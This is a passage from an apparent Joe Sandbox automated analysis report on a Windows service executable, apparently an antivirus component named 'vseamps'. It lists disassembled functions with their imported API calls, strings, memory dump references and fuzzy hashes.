LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/service, xrefs: 000000014000153F
/remove, xrefs: 000000014000157E
vseamps, xrefs: 0000000140001538

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

GetActiveWindow, xrefs: 000000014000F075
MessageBoxA, xrefs: 000000014000F054
GetProcessWindowStation, xrefs: 000000014000F10D
GetUserObjectInformationA, xrefs: 000000014000F0E9
GetLastActivePopup, xrefs: 000000014000F094
USER32.DLL, xrefs: 000000014000F03B

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

..., xrefs: 0000000140009431
<program name unknown>, xrefs: 00000001400093D9
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
Runtime Error!Program: , xrefs: 000000014000938D

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFE13202630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE1320264C
RtlCaptureContext.KERNEL32 ref: 00007FFE13202679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE13202693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE132026D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE13202728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE13202745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE13202750

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: b45511375f6b95b5bbe607e6132c8178157d0ad52ffacfbbeb251530e3bfe459
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: 5A316D72608F818AEB60AF61E8403ED7361FBA5758F44403ADA4E67BA5DF38C648C710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFE132076E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE13207759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE13207771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE132077AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE132077E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE132077EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE132077FA

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 3fcb55011bcafaea8dad090f616b4d27293f7d5aa6a5ab4bdd55e21732c7fdc0
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: C7316132618F8189DB60DF26E8402AE73A4FBE5764F500176EA9D53B65DF3CD149CB00

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFE13210248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE13210497
RaiseException.KERNEL32 ref: 00007FFE132104A8

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: fe5263e204a04b5544e0632a75cabc386e24d3d3a562b7af1947b06aa55c5468
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 19B13473A00B898BEB15DF2AC98636C7BA0F784B58F14C962DA5D837A9CB3DD451C700

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

